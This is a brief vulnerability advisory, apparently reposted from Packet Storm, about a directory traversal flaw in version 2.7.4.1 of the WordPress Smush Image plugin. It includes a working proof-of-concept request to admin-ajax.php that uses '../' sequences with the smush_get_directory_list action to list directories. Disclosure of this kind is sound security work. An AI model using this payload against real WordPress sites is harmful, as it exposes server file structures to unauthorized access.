WordPress Smush Image 2.7.4.1 Directory Traversal

WordPress Smush Image plugin version 2.7.4.1 suffers from a directory traversal vulnerability.


MD5 | 74031598272cf1973422350b4130cab0

Download
Class  File transversal
Remote  Yes
Credit  Ricardo Sanchez

Smush Image Wordpress WP plugin is prone to file transversal vulnerability
because it fails to sufficiently folders privacy.

To exploit this issue following steps:

Demo url:
http://localhost/wordpress/wp-admin/admin-ajax.php?dir=../../../../../../&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx


Confirm:
https://wordpress.org/support/topic/file-transversal-bug/#post-9554401

Source: packetstormsecurity.com
Related Posts